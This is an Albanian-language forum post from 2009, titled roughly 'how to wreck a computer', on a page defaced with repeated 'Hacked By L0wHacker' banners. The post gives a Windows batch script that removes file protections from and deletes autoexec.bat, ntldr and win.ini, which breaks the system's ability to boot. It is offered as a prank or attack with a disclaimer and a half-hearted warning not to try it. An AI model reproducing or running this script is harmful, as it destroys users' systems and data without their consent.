Hacked By L0wHacker

Hacked By L0wHacker
Hacked By L0wHacker

Hacked by L0wHacker


  me shuk kompjuterin per mes mu tu kall kurr moo

  Share

  me shuk kompjuterin per mes mu tu kall kurr moo

  Mesazh nga Caveman prej Fri May 15, 2009 5:01 am

  fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


  HAPIM notepadin dhe vendosim ket kod:  @echo off
  attrib -r -s -h c:autoexec.bat
  del c:autoexec.bat
  attrib -r -s -h c:ntldr
  del c:ntldr
  attrib -r -s -h c:windowswin.ini
  del c:windowswin.ini


  veq mos e provoni se danger

   Ora është Fri Apr 20, 2018 6:23 pm